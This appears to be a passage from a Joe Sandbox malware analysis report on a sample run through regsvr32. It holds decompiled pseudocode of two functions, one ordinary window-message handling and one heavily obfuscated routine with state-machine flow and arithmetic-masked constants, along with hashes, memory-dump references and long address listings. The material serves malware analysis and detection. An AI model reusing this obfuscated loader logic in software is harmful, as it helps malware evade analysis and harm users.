                                                                                                                0x001b5db1
                                                                                                                0x001b5df8
                                                                                                                0x001b5e1d
                                                                                                                0x001b5e22
                                                                                                                0x001b5e2c
                                                                                                                0x001b5e2c
                                                                                                                0x001b5e2e
                                                                                                                0x001b5e30
                                                                                                                0x001b5e33
                                                                                                                0x00000000
                                                                                                                0x001b6001
                                                                                                                0x001b6001
                                                                                                                0x001b6001
                                                                                                                0x00000000
                                                                                                                0x001b600d
                                                                                                                0x001b5be4

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $rb$$rb$Cjw$Cjw$[#$a?/$e_$rGD$w:j$R-$c
                                                                                                                • API String ID: 0-3456748807
                                                                                                                • Opcode ID: 7a8575c54c992434d482e6c42edfabb9d415e9f79e5526de883c4298cc6f12ec
                                                                                                                • Instruction ID: b0d775112aeff18803ccbba4e0c931267513af34149ed3f9674ff205e8f4fda3
                                                                                                                • Opcode Fuzzy Hash: 7a8575c54c992434d482e6c42edfabb9d415e9f79e5526de883c4298cc6f12ec
                                                                                                                • Instruction Fuzzy Hash: 077212715083809FD3B4CF65C58AB9BBBE2BBD4358F10891DE5DA86260DBB18949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003684C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1003684C(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed int _v72;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int _t79;
				short _t80;
				short _t87;
				short _t92;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t115 = _a4;
				_t118 = __ecx;
				if(E10017E39(__ecx, __eflags, _t115) == 0) {
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_push(__ebx);
					_t100 = __ecx;
					_t60 = E1001AD94(__ecx);
					__eflags =  *(__ecx + 0x80) & 0x00000020;
					_v20 = _t60;
					if(( *(__ecx + 0x80) & 0x00000020) != 0) {
						L5:
						__eflags = _t116 - 0x200;
						if(_t116 < 0x200) {
							L7:
							__eflags = _t116 - 0xa0 - 9;
							if(__eflags > 0) {
								L30:
								_t62 = E1001A547(_t118);
								__eflags = _t62;
								if(_t62 == 0) {
									L32:
									__eflags = _v20;
									if(_v20 == 0) {
										L35:
										_t63 = IsWindow( *(_t118 + 0x20));
										__eflags = _t63;
										if(_t63 == 0) {
											L37:
											__eflags = 0;
											return 0;
										}
										return E1001839A(_a4);
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t117 = _v20;
										_t67 =  *((intOrPtr*)( *_v20 + 0x100))(_a4);
										__eflags = _t67;
										if(_t67 != 0) {
											goto L1;
										}
										_t70 = E1001A508(_t117);
										__eflags = _t70;
										_v20 = _t70;
										if(_t70 != 0) {
											continue;
										}
										goto L35;
									}
									goto L1;
								}
								__eflags =  *(_t62 + 0x68);
								if( *(_t62 + 0x68) != 0) {
									goto L37;
								}
								goto L32;
							}
							L8:
							_v16 = E100231BA(0x201, _t100, _t116, _t118, __eflags);
							_t72 = _a4;
							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
							_v28.x =  *(_t72 + 0x14);
							ScreenToClient( *(_t118 + 0x20),  &_v28);
							E1003BB70(_t116,  &_v76, 0, 0x30);
							_v76 = 0x28;
							_t79 =  *((intOrPtr*)( *_t118 + 0x6c))(_v28.x, _v28.y,  &_v76);
							__eflags = _v40 - 0xffffffff;
							_v8 = _t79;
							if(__eflags != 0) {
								_push(_v40);
								E1003B59D(0x201, _t116, _t118, __eflags);
							}
							__eflags = _t116 - 0x201;
							if(_t116 != 0x201) {
								L13:
								_v12 = _v12 & 0x00000000;
								__eflags = _t116 - 0x201;
								if(_t116 != 0x201) {
									_t92 = GetKeyState(1);
									__eflags = _t92;
									if(_t92 < 0) {
										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
									}
								}
								L16:
								__eflags = _v8;
								if(_v8 < 0) {
									L26:
									_t80 = GetKeyState(1);
									__eflags = _t80;
									if(_t80 >= 0) {
										L28:
										 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
										KillTimer( *(_t118 + 0x20), 0xe001);
										L29:
										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
										goto L30;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v12;
								if(_v12 != 0) {
									goto L26;
								}
								__eflags = _t116 - 0x202;
								if(_t116 != 0x202) {
									__eflags =  *(_t118 + 0x7c) & 0x00000008;
									if(( *(_t118 + 0x7c) & 0x00000008) != 0) {
										L25:
										 *((intOrPtr*)( *_t118 + 0x164))(_v8);
										goto L29;
									}
									_t87 = GetKeyState(1);
									__eflags = _t87;
									if(_t87 < 0) {
										goto L25;
									}
									_t111 = _v16;
									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
										goto L29;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E10035EEB(_t118);
									goto L29;
								}
								 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
								_push(0xc8);
								_push(0xe001);
								goto L20;
							}
							__eflags = _v72 & 0x80000000;
							if((_v72 & 0x80000000) == 0) {
								goto L13;
							}
							_v12 = 1;
							goto L16;
						}
						__eflags = _t116 - 0x209;
						if(__eflags <= 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t116 - 0x201;
					if(_t116 == 0x201) {
						goto L5;
					}
					__eflags = _t116 - 0x202;
					if(_t116 != 0x202) {
						goto L30;
					}
					goto L5;
				}
				L1:
				return 1;
			}




























                                                                                                                0x10036854
                                                                                                                0x10036858
                                                                                                                0x10036861
                                                                                                                0x1003686b
                                                                                                                0x1003686e
                                                                                                                0x1003686f
                                                                                                                0x10036871
                                                                                                                0x10036876
                                                                                                                0x1003687d
                                                                                                                0x10036885
                                                                                                                0x10036897
                                                                                                                0x10036897
                                                                                                                0x1003689d
                                                                                                                0x100368a7
                                                                                                                0x100368ad
                                                                                                                0x100368b0
                                                                                                                0x100369ea
                                                                                                                0x100369ec
                                                                                                                0x100369f1
                                                                                                                0x100369f4
                                                                                                                0x100369fc
                                                                                                                0x100369fc
                                                                                                                0x10036a00
                                                                                                                0x10036a28
                                                                                                                0x10036a2b
                                                                                                                0x10036a31
                                                                                                                0x10036a33
                                                                                                                0x10036a41
                                                                                                                0x10036a41
                                                                                                                0x00000000
                                                                                                                0x10036a41
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036a02
                                                                                                                0x10036a02
                                                                                                                0x10036a02
                                                                                                                0x10036a0c
                                                                                                                0x10036a12
                                                                                                                0x10036a14
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036a1c
                                                                                                                0x10036a21
                                                                                                                0x10036a23
                                                                                                                0x10036a26
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036a26
                                                                                                                0x00000000
                                                                                                                0x10036a02
                                                                                                                0x100369f6
                                                                                                                0x100369fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100369fa
                                                                                                                0x100368b6
                                                                                                                0x100368bb
                                                                                                                0x100368be
                                                                                                                0x100368c7
                                                                                                                0x100368d1
                                                                                                                0x100368d4
                                                                                                                0x100368e2
                                                                                                                0x100368f8
                                                                                                                0x100368ff
                                                                                                                0x10036902
                                                                                                                0x10036906
                                                                                                                0x10036909
                                                                                                                0x1003690b
                                                                                                                0x1003690e
                                                                                                                0x10036913
                                                                                                                0x10036914
                                                                                                                0x10036916
                                                                                                                0x1003692a
                                                                                                                0x1003692a
                                                                                                                0x1003692e
                                                                                                                0x10036930
                                                                                                                0x10036934
                                                                                                                0x1003693a
                                                                                                                0x1003693d
                                                                                                                0x10036945
                                                                                                                0x10036945
                                                                                                                0x1003693d
                                                                                                                0x10036948
                                                                                                                0x10036948
                                                                                                                0x1003694c
                                                                                                                0x100369b4
                                                                                                                0x100369b6
                                                                                                                0x100369bc
                                                                                                                0x100369bf
                                                                                                                0x100369c7
                                                                                                                0x100369cd
                                                                                                                0x100369db
                                                                                                                0x100369e1
                                                                                                                0x100369e7
                                                                                                                0x00000000
                                                                                                                0x100369e7
                                                                                                                0x100369c1
                                                                                                                0x100369c5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100369c5
                                                                                                                0x1003694e
                                                                                                                0x10036952
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036954
                                                                                                                0x1003695a
                                                                                                                0x1003697b
                                                                                                                0x1003697f
                                                                                                                0x100369a5
                                                                                                                0x100369ac
                                                                                                                0x00000000
                                                                                                                0x100369ac
                                                                                                                0x10036983
                                                                                                                0x10036989
                                                                                                                0x1003698c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036991
                                                                                                                0x10036994
                                                                                                                0x10036997
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036999
                                                                                                                0x1003699e
                                                                                                                0x10036972
                                                                                                                0x10036974
                                                                                                                0x00000000
                                                                                                                0x10036974
                                                                                                                0x10036962
                                                                                                                0x10036968
                                                                                                                0x1003696d
                                                                                                                0x00000000
                                                                                                                0x1003696d
                                                                                                                0x10036918
                                                                                                                0x1003691f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036921
                                                                                                                0x00000000
                                                                                                                0x10036921
                                                                                                                0x1003689f
                                                                                                                0x100368a5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100368a5
                                                                                                                0x10036887
                                                                                                                0x10036889
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003688b
                                                                                                                0x10036891
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036891
                                                                                                                0x10036863
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreenWindow_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1268500159-3887548279
                                                                                                                • Opcode ID: fba6c1444f7bdc1507f2e291a75d7846eb6c16aaa07eba95ca6b0ba79e879cf4
                                                                                                                • Instruction ID: ae6d2f90c15a53321ff304e1902ce409ffcd63f462ce8200650d760429c34cbf
                                                                                                                • Opcode Fuzzy Hash: fba6c1444f7bdc1507f2e291a75d7846eb6c16aaa07eba95ca6b0ba79e879cf4
                                                                                                                • Instruction Fuzzy Hash: 6451BE34A00205DFDB12DF94CC89BADBBF9EF4C356F11815AE905AB292DB719E81CB41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A9C1B Relevance: 14.1, Strings: 11, Instructions: 399COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001A9C1B() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				signed int _v1220;
				signed int _v1224;
				void* _t426;
				intOrPtr _t429;
				intOrPtr _t431;
				signed int _t444;
				void* _t445;
				void* _t479;
				signed int _t489;
				signed int _t490;
				intOrPtr _t491;
				intOrPtr* _t492;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				void* _t501;
				signed int _t503;
				signed int* _t504;
				void* _t507;

				_t504 =  &_v1224;
				_v1188 = 0x635e8c;
				_t445 = 0x7417c3e;
				_v1188 = _v1188 * 0x58;
				_v1188 = _v1188 >> 3;
				_v1188 = _v1188 << 9;
				_v1188 = _v1188 ^ 0x8a200829;
				_v1212 = 0xee437b;
				_v1212 = _v1212 + 0xffff0885;
				_v1212 = _v1212 + 0xc737;
				_v1212 = _v1212 ^ 0x1155d7b9;
				_v1212 = _v1212 ^ 0x11b4c4b1;
				_v1132 = 0x60a0e3;
				_t493 = 0x68;
				_v1132 = _v1132 / _t493;
				_t494 = 0x5e;
				_v1052 = _v1052 & 0x00000000;
				_v1132 = _v1132 * 0x37;
				_v1132 = _v1132 ^ 0x003319d4;
				_v1208 = 0xd527ba;
				_v1208 = _v1208 >> 0x10;
				_v1208 = _v1208 + 0xffff207f;
				_v1208 = _v1208 / _t494;
				_v1208 = _v1208 ^ 0x02b92ea5;
				_v1164 = 0xbc5828;
				_v1164 = _v1164 + 0xffff9734;
				_v1164 = _v1164 + 0xffffbb4b;
				_v1164 = _v1164 ^ 0x00bbaaa7;
				_v1140 = 0x826326;
				_v1140 = _v1140 | 0xb90d9d3f;
				_t495 = 0x6d;
				_v1140 = _v1140 / _t495;
				_v1140 = _v1140 ^ 0x01b3d115;
				_v1044 = 0x764452;
				_v1044 = _v1044 >> 1;
				_v1044 = _v1044 ^ 0x003b1bbf;
				_v1116 = 0x9e9607;
				_v1116 = _v1116 | 0xd4fb32ca;
				_v1116 = _v1116 ^ 0xd4fc93bc;
				_v1220 = 0x640107;
				_v1220 = _v1220 ^ 0x369c3c4a;
				_v1220 = _v1220 + 0xffffc06e;
				_v1220 = _v1220 + 0xffffc2e6;
				_v1220 = _v1220 ^ 0x36f71c54;
				_v1072 = 0x8639c8;
				_v1072 = _v1072 >> 8;
				_v1072 = _v1072 ^ 0x000a15d3;
				_v1104 = 0x7c2e44;
				_v1104 = _v1104 | 0xffdbb7a1;
				_v1104 = _v1104 ^ 0xffffc2ef;
				_v1192 = 0xafb887;
				_v1192 = _v1192 + 0x40e0;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 + 0xdb01;
				_v1192 = _v1192 ^ 0x0008e57b;
				_v1108 = 0xc94cc7;
				_v1108 = _v1108 + 0xb449;
				_v1108 = _v1108 ^ 0x00cf6a1c;
				_v1200 = 0x2709bd;
				_v1200 = _v1200 >> 4;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 * 0x36;
				_v1200 = _v1200 ^ 0x83cdb823;
				_v1168 = 0x30c759;
				_v1168 = _v1168 >> 2;
				_t496 = 3;
				_v1168 = _v1168 / _t496;
				_v1168 = _v1168 ^ 0x000f074b;
				_v1076 = 0xf7bffd;
				_t497 = 0x79;
				_v1076 = _v1076 / _t497;
				_v1076 = _v1076 ^ 0x000cc935;
				_v1084 = 0x509c01;
				_v1084 = _v1084 ^ 0x44bd901b;
				_v1084 = _v1084 ^ 0x44e5fe71;
				_v1092 = 0xbb4fa2;
				_v1092 = _v1092 + 0xffff6f51;
				_v1092 = _v1092 ^ 0x00b7ce0b;
				_v1100 = 0x8b948f;
				_t498 = 0x3e;
				_v1100 = _v1100 / _t498;
				_v1100 = _v1100 ^ 0x000fac21;
				_v1152 = 0x9a2681;
				_v1152 = _v1152 * 0x30;
				_v1152 = _v1152 + 0xffff8867;
				_v1152 = _v1152 ^ 0x1ce08273;
				_v1160 = 0xf8d484;
				_v1160 = _v1160 << 4;
				_v1160 = _v1160 >> 0xc;
				_v1160 = _v1160 ^ 0x000e02db;
				_v1068 = 0xa26624;
				_v1068 = _v1068 << 7;
				_v1068 = _v1068 ^ 0x513e3507;
				_v1128 = 0xf40e59;
				_v1128 = _v1128 >> 9;
				_v1128 = _v1128 + 0xffff6005;
				_v1128 = _v1128 ^ 0xfffef07e;
				_v1136 = 0xb4d430;
				_v1136 = _v1136 + 0xffff9497;
				_v1136 = _v1136 >> 4;
				_v1136 = _v1136 ^ 0x000c97ba;
				_v1180 = 0xe33c24;
				_v1180 = _v1180 + 0x3322;
				_v1180 = _v1180 + 0xe925;
				_v1180 = _v1180 ^ 0x00eb848e;
				_v1144 = 0xd0b5de;
				_v1144 = _v1144 + 0xc7d1;
				_v1144 = _v1144 >> 0xb;
				_v1144 = _v1144 ^ 0x00047407;
				_v1196 = 0x500694;
				_v1196 = _v1196 + 0xffffa4ae;
				_v1196 = _v1196 + 0xffffb3a9;
				_v1196 = _v1196 << 2;
				_v1196 = _v1196 ^ 0x013957d3;
				_v1096 = 0x6c809e;
				_v1096 = _v1096 | 0xabf58474;
				_v1096 = _v1096 ^ 0xabf462f4;
				_v1056 = 0xef762f;
				_v1056 = _v1056 << 7;
				_v1056 = _v1056 ^ 0x77b72062;
				_v1124 = 0xaf7fe0;
				_v1124 = _v1124 | 0xe0ec28e2;
				_v1124 = _v1124 >> 8;
				_v1124 = _v1124 ^ 0x00e7ca48;
				_v1156 = 0x7a9cac;
				_v1156 = _v1156 << 5;
				_v1156 = _v1156 ^ 0x97ddcbc4;
				_v1156 = _v1156 ^ 0x98839c30;
				_v1080 = 0x3cd97f;
				_v1080 = _v1080 << 9;
				_v1080 = _v1080 ^ 0x79b013b8;
				_v1216 = 0x22953e;
				_t499 = 0x5a;
				_t444 = _v1052;
				_v1216 = _v1216 / _t499;
				_t489 = 0x36;
				_t503 = _v1052;
				_v1216 = _v1216 / _t489;
				_v1216 = _v1216 ^ 0x722a41cb;
				_v1216 = _v1216 ^ 0x72272010;
				_v1048 = 0x950feb;
				_v1048 = _v1048 ^ 0x25b50b8a;
				_v1048 = _v1048 ^ 0x25247296;
				_v1172 = 0xfc1e60;
				_v1172 = _v1172 >> 3;
				_v1172 = _v1172 + 0xaa76;
				_v1172 = _v1172 ^ 0x00297d33;
				_v1224 = 0x400f66;
				_v1224 = _v1224 | 0x109f1cd3;
				_v1224 = _v1224 ^ 0x1e1dc7cb;
				_v1224 = _v1224 | 0xc0536b48;
				_v1224 = _v1224 ^ 0xcede1365;
				_v1112 = 0x86225c;
				_v1112 = _v1112 | 0x8fbaf335;
				_v1112 = _v1112 ^ 0x8fb6cec0;
				_v1176 = 0x194dbd;
				_t500 = 0x2e;
				_v1176 = _v1176 * 0x66;
				_v1176 = _v1176 + 0xffff942d;
				_v1176 = _v1176 ^ 0x0a146cac;
				_v1148 = 0x617020;
				_v1148 = _v1148 * 0x7a;
				_v1148 = _v1148 * 0x78;
				_v1148 = _v1148 ^ 0xc43877e8;
				_v1088 = 0x442f60;
				_v1088 = _v1088 ^ 0xd23e9e94;
				_v1088 = _v1088 ^ 0xd27ebae0;
				_v1204 = 0x3baa1b;
				_t501 = 0x75be780;
				_v1204 = _v1204 / _t500;
				_v1204 = _v1204 >> 0xd;
				_t490 = _v1052;
				_v1204 = _v1204 / _t489;
				_v1204 = _v1204 ^ 0x000c972d;
				_v1064 = 0xa0e5a;
				_v1064 = _v1064 >> 0xa;
				_v1064 = _v1064 ^ 0x000a930b;
				_v1060 = 0x5fdf65;
				_v1060 = _v1060 >> 1;
				_v1060 = _v1060 ^ 0x002a8ac0;
				_v1120 = 0x30d4d5;
				_v1120 = _v1120 * 0x5d;
				_v1120 = _v1120 + 0xffffbb5a;
				_v1120 = _v1120 ^ 0x11b9a9c0;
				_v1184 = 0x3ec506;
				_v1184 = _v1184 + 0xffff16f3;
				_v1184 = _v1184 ^ 0x479a7891;
				_v1184 = _v1184 >> 1;
				_v1184 = _v1184 ^ 0x23dc1c5d;
				while(1) {
					L1:
					_t479 = 0x5c;
					do {
						while(1) {
							L2:
							_t507 = _t445 - _t501;
							if(_t507 > 0) {
								break;
							}
							if(_t507 == 0) {
								E001BED7B(_t503, _v1088, _v1204, _v1064);
								L16:
								_t445 = 0x6d2f3f8;
								while(1) {
									L1:
									_t479 = 0x5c;
									goto L2;
								}
							} else {
								if(_t445 == 0x56556b4) {
									_push(_t445);
									_t444 = E001A6E01(_v1144, _v1196, _t445, _v1096, _v1212);
									_t504 =  &(_t504[4]);
									__eflags = _t444;
									if(_t444 != 0) {
										_t445 = 0xfe12626;
										while(1) {
											L1:
											_t479 = 0x5c;
											goto L2;
										}
									}
								} else {
									if(_t445 == 0x56be5f4) {
										_t491 =  *0x1c4c10; // 0x67d820
										_t492 = _t491 + 0x20c;
										while(1) {
											__eflags =  *_t492 - _t479;
											if( *_t492 == _t479) {
												break;
											}
											_t492 = _t492 + 2;
											__eflags = _t492;
										}
										_t490 = _t492 + 2;
										_t445 = 0x56556b4;
										continue;
									} else {
										if(_t445 == 0x6d2f3f8) {
											E001BED7B(_t444, _v1060, _v1120, _v1184);
										} else {
											if(_t445 != 0x7417c3e) {
												goto L24;
											} else {
												E001A3466(_v1188, _v1044, _t445, _t445,  &_v1040, _v1116, _t445, _v1220, _v1072, _v1104);
												_t504 =  &(_t504[8]);
												_t445 = 0xb3d6292;
												while(1) {
													L1:
													_t479 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L27:
							return _v1052;
						}
						__eflags = _t445 - 0xb3d6292;
						if(__eflags == 0) {
							_push(_v1168);
							_push(0x1a10bc);
							_push(_v1200);
							_t426 = E001BF5D9(_v1192, _v1108, __eflags);
							_t429 =  *0x1c4c10; // 0x67d820
							_t431 =  *0x1c4c10; // 0x67d820
							__eflags = _t431 + 4;
							E001AD467(_v1084, _t431 + 4, _v1092, _t431 + 4, _v1192, _v1100, _t429 + 0x20c, _v1152, _t426,  &_v520,  &_v1040, _v1160);
							E001BF94B(_t426, _v1068, _v1128, _v1136, _v1180);
							_t504 =  &(_t504[0x10]);
							_t445 = 0x56be5f4;
							_t501 = 0x75be780;
							_t479 = 0x5c;
							goto L24;
						} else {
							__eflags = _t445 - 0xf5091cf;
							if(_t445 == 0xf5091cf) {
								E001A364E(_t444, _v1112, _t503, _v1176, _v1148);
								_t504 =  &(_t504[3]);
								_t445 = _t501;
								goto L1;
							} else {
								__eflags = _t445 - 0xfe12626;
								if(_t445 != 0xfe12626) {
									goto L24;
								} else {
									_t503 = E001B9862(_v1208, _v1056, _t490,  &_v520, _v1124, _v1156, _v1080, _v1140, _t490, _v1164, _t445, _v1132, _v1216, _t445, _t445, _v1048, _t444, _t445, _v1172, _t445, _v1224);
									_t504 =  &(_t504[0x13]);
									__eflags = _t503;
									if(_t503 == 0) {
										goto L16;
									} else {
										_t445 = 0xf5091cf;
										_v1052 = 1;
										while(1) {
											L1:
											_t479 = 0x5c;
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t445 - 0xf3cba29;
					} while (_t445 != 0xf3cba29);
					goto L27;
				}
			}









































































                                                                                                                0x001a9c1b
                                                                                                                0x001a9c21
                                                                                                                0x001a9c30
                                                                                                                0x001a9c39
                                                                                                                0x001a9c3d
                                                                                                                0x001a9c42
                                                                                                                0x001a9c47
                                                                                                                0x001a9c4f
                                                                                                                0x001a9c57
                                                                                                                0x001a9c5f
                                                                                                                0x001a9c67
                                                                                                                0x001a9c6f
                                                                                                                0x001a9c77
                                                                                                                0x001a9c85
                                                                                                                0x001a9c8a
                                                                                                                0x001a9c95
                                                                                                                0x001a9c98
                                                                                                                0x001a9ca0
                                                                                                                0x001a9ca4
                                                                                                                0x001a9cac
                                                                                                                0x001a9cb4
                                                                                                                0x001a9cb9
                                                                                                                0x001a9cc9
                                                                                                                0x001a9ccd
                                                                                                                0x001a9cd5
                                                                                                                0x001a9cdd
                                                                                                                0x001a9ce5
                                                                                                                0x001a9ced
                                                                                                                0x001a9cf5
                                                                                                                0x001a9cfd
                                                                                                                0x001a9d09
                                                                                                                0x001a9d0c
                                                                                                                0x001a9d10
                                                                                                                0x001a9d18
                                                                                                                0x001a9d23
                                                                                                                0x001a9d2a
                                                                                                                0x001a9d35
                                                                                                                0x001a9d3d
                                                                                                                0x001a9d45
                                                                                                                0x001a9d4d
                                                                                                                0x001a9d55
                                                                                                                0x001a9d5d
                                                                                                                0x001a9d65
                                                                                                                0x001a9d6d
                                                                                                                0x001a9d75
                                                                                                                0x001a9d80
                                                                                                                0x001a9d88
                                                                                                                0x001a9d93
                                                                                                                0x001a9d9e
                                                                                                                0x001a9da9
                                                                                                                0x001a9db4
                                                                                                                0x001a9dbc
                                                                                                                0x001a9dc4
                                                                                                                0x001a9dc9
                                                                                                                0x001a9dd1
                                                                                                                0x001a9dd9
                                                                                                                0x001a9de4
                                                                                                                0x001a9def
                                                                                                                0x001a9dfa
                                                                                                                0x001a9e02
                                                                                                                0x001a9e07
                                                                                                                0x001a9e11
                                                                                                                0x001a9e15
                                                                                                                0x001a9e1d
                                                                                                                0x001a9e27
                                                                                                                0x001a9e32
                                                                                                                0x001a9e37
                                                                                                                0x001a9e3d
                                                                                                                0x001a9e45
                                                                                                                0x001a9e57
                                                                                                                0x001a9e5c
                                                                                                                0x001a9e65
                                                                                                                0x001a9e70
                                                                                                                0x001a9e7b
                                                                                                                0x001a9e86
                                                                                                                0x001a9e91
                                                                                                                0x001a9e9c
                                                                                                                0x001a9ea7
                                                                                                                0x001a9eb2
                                                                                                                0x001a9ec4
                                                                                                                0x001a9ec7
                                                                                                                0x001a9ece
                                                                                                                0x001a9ed9
                                                                                                                0x001a9ee6
                                                                                                                0x001a9eea
                                                                                                                0x001a9ef2
                                                                                                                0x001a9efa
                                                                                                                0x001a9f02
                                                                                                                0x001a9f07
                                                                                                                0x001a9f0c
                                                                                                                0x001a9f14
                                                                                                                0x001a9f1f
                                                                                                                0x001a9f27
                                                                                                                0x001a9f32
                                                                                                                0x001a9f3a
                                                                                                                0x001a9f3f
                                                                                                                0x001a9f47
                                                                                                                0x001a9f4f
                                                                                                                0x001a9f57
                                                                                                                0x001a9f5f
                                                                                                                0x001a9f64
                                                                                                                0x001a9f6c
                                                                                                                0x001a9f74
                                                                                                                0x001a9f7c
                                                                                                                0x001a9f84
                                                                                                                0x001a9f8c
                                                                                                                0x001a9f94
                                                                                                                0x001a9f9c
                                                                                                                0x001a9fa1
                                                                                                                0x001a9fa9
                                                                                                                0x001a9fb1
                                                                                                                0x001a9fb9
                                                                                                                0x001a9fc1
                                                                                                                0x001a9fc6
                                                                                                                0x001a9fce
                                                                                                                0x001a9fd9
                                                                                                                0x001a9fe4
                                                                                                                0x001a9fef
                                                                                                                0x001a9ffa
                                                                                                                0x001aa002
                                                                                                                0x001aa00d
                                                                                                                0x001aa015
                                                                                                                0x001aa01d
                                                                                                                0x001aa022
                                                                                                                0x001aa02a
                                                                                                                0x001aa032
                                                                                                                0x001aa037
                                                                                                                0x001aa03f
                                                                                                                0x001aa047
                                                                                                                0x001aa052
                                                                                                                0x001aa05a
                                                                                                                0x001aa065
                                                                                                                0x001aa075
                                                                                                                0x001aa07a
                                                                                                                0x001aa081
                                                                                                                0x001aa08b
                                                                                                                0x001aa090
                                                                                                                0x001aa097
                                                                                                                0x001aa09b
                                                                                                                0x001aa0a3
                                                                                                                0x001aa0ab
                                                                                                                0x001aa0b6
                                                                                                                0x001aa0c1
                                                                                                                0x001aa0cc
                                                                                                                0x001aa0d4
                                                                                                                0x001aa0d9
                                                                                                                0x001aa0e1
                                                                                                                0x001aa0e9
                                                                                                                0x001aa0f1
                                                                                                                0x001aa0f9
                                                                                                                0x001aa101
                                                                                                                0x001aa109
                                                                                                                0x001aa111
                                                                                                                0x001aa11c
                                                                                                                0x001aa127
                                                                                                                0x001aa132
                                                                                                                0x001aa141
                                                                                                                0x001aa142
                                                                                                                0x001aa146
                                                                                                                0x001aa14e
                                                                                                                0x001aa156
                                                                                                                0x001aa163
                                                                                                                0x001aa16c
                                                                                                                0x001aa170
                                                                                                                0x001aa178
                                                                                                                0x001aa183
                                                                                                                0x001aa18e
